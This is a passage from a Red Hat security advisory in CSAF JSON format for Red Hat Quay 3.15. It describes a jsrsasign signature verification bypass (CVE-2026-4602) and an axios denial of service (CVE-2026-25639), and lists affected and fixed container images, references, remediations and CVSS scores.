"text": "A flaw was found in jsrsasign. A remote attacker can exploit an incorrect conversion between numeric types by providing a negative exponent to the `modPow` function. This vulnerability can force the computation of incorrect modular inverses, which ultimately allows an attacker to bypass signature verification.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jsrsasign: jsrsasign: Signature verification bypass via negative exponent handling",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an IMPORTANT flaw. The `jsrsasign` library, as used in Red Hat products such as Migration Toolkit for Virtualization and Red Hat Quay, is vulnerable to a signature verification bypass. A remote attacker could provide a specially crafted negative exponent to the `modPow` function, leading to incorrect modular inverse computations and allowing them to bypass signature verification.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-4602"
},
{
"category": "external",
"summary": "RHBZ#2450206",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450206"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-4602",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4602"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-4602",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4602"
},
{
"category": "external",
"summary": "https://gist.github.com/Kr0emer/7ecd2be7d17419e4677315ef3758faf5",
"url": "https://gist.github.com/Kr0emer/7ecd2be7d17419e4677315ef3758faf5"
},
{
"category": "external",
"summary": "https://github.com/kjur/jsrsasign/commit/5ea1c32bb2aa894b4bd29849839afe4f98728195",
"url": "https://github.com/kjur/jsrsasign/commit/5ea1c32bb2aa894b4bd29849839afe4f98728195"
},
{
"category": "external",
"summary": "https://github.com/kjur/jsrsasign/pull/650",
"url": "https://github.com/kjur/jsrsasign/pull/650"
},
{
"category": "external",
"summary": "https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-15371175",
"url": "https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-15371175"
}
],
"release_date": "2026-03-23T05:00:10.567000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T22:07:28+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6568"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "jsrsasign: jsrsasign: Signature verification bypass via negative exponent handling"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T22:07:28+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6568"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
